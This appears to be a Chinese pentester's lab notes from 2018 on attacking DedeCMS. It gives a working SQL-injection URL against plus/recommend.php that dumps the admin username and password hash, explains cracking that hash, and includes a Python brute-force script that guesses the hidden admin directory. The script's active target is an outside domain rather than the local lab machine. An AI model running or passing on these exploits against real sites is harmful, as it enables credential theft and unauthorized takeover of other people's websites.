webug-dedecms test


Body:

1. DedeCMS v5.7 latest SQL injection + getshell vulnerability (plus/download.php)

http://www.hackdig.com/?06/hack-4026.htm
https://www.seebug.org/vuldb/ssvid-60834

2. DedeCMS all-version SQL injection vulnerability exploitation

http://www.weixianmanbu.com/article/157.html

3. DedeCMS recommend.php all-version SQL injection vulnerability

https://blog.csdn.net/change518/article/details/20564207
PoC:
plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
Result:
文档的名称是:|admin|747a6afbbcbf8be7668a
网址是:http://localhost9=3
This is the DedeCMS ciphertext, 20 characters long. The DedeCMS admin password hash is a 20-character slice cut out of the 32-character MD5, so removing the first 3 and the last 1 characters yields the 16-character MD5 value:
a6afbbcbf8be7668, which cracks to:
test123
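An added example (not code from the original post) that reproduces the truncation scheme described above, so the post's result can be checked offline; it assumes only the standard library `hashlib` and `hmac` modules.

```python
import hashlib
import hmac

# DedeCMS-style stored hash: 20 characters cut out of the 32-character hex MD5,
# starting at offset 5 (the scheme described in the post). No salt is involved,
# so equal passwords always produce equal stored values.
def dede_hash(password: str) -> str:
    full = hashlib.md5(password.encode("utf-8")).hexdigest()
    return full[5:25]

# Drop the first 3 and the last 1 characters of the 20-char value to get the
# classic 16-character MD5 (full[8:24]) that ordinary MD5 tooling understands.
def dede_to_md5_16(stored: str) -> str:
    if len(stored) != 20:
        raise ValueError("DedeCMS admin hashes are 20 hex characters")
    return stored[3:19]

# Verify a candidate password against a stored 20-char hash, comparing in
# constant time so the check itself does not leak timing information.
def verify_dede_password(password: str, stored: str) -> bool:
    return hmac.compare_digest(dede_hash(password), stored.lower())

if __name__ == "__main__":
    stored = "747a6afbbcbf8be7668a"   # value shown in the post's output above
    print(dede_to_md5_16(stored))     # a6afbbcbf8be7668
    print(verify_dede_password("test123", stored))  # True
```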

II. Finding the admin backend

1. Google hacking

site:inurl:login.php
site:http://192.168.244.137/pentest/cms/dedecms1/ inurl:login.php
The local instance has not been indexed.

2. DedeCMS backend

https://xz.aliyun.com/t/2064
https://www.cnblogs.com/zhaijiahui/p/8484667.html (this one works)
Two things to note:
1. If tags.php does not exist in the web root, the POST body of the PoC should be written like this:

    http://localhost/dedecms/plus/diy.php
    POST
    dopost=save&_FILES[b4dboy][tmp_name]=./../de</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif

2.
You may hit an "HTTP max connections" error. It may be a problem on the local machine; update the requests library:
pip install --upgrade requests
It may also be that the site has protection in place; add time.sleep(2).
Get into the habit of adding a delay, so the test does not turn into a DoS attack.
It may also be this situation:
s = requests.session()
requests.adapters.DEFAULT_RETRIES = 10
s.keep_alive = False

#!/usr/bin/env python
#coding=utf-8
'''/*
    * author = Mochazz
    * team   = 红日安全团队
    * env    = python3
    *
    */
'''
import requests
import itertools
import string,time
s = requests.session()
requests.adapters.DEFAULT_RETRIES = 10
s.keep_alive = False
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
# url = "http://192.168.1.9/tags.php"
url = "http://www.300480.cn/tags.php"
data = {
    "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",
    "_FILES[mochazz][name]" : 0,
    "_FILES[mochazz][size]" : 0,
    "_FILES[mochazz][type]" : "image/gif"
}
for num in range(1,7):
    time.sleep(2)
    if flag:
        break
    for pre in itertools.permutations(characters,num):
        time.sleep(2)
        pre = ''.join(list(pre))
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
        print("testing",pre)
        r = s.post(url,data=data)
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            flag = 1
            back_dir = pre
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print("[+] 前缀为:",back_dir)
flag = 0
for i in range(30):
    time.sleep(2)
    if flag:
        break
    for ch in characters:
        time.sleep(2)
        if ch == characters[-1]:
            flag = 1
            break
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)
        r = s.post(url, data=data)
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            back_dir += ch
            print("[+] ",back_dir)
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print("后台地址为:",back_dir)

Found the backend directory: dede
Logged in.

2018.7.9
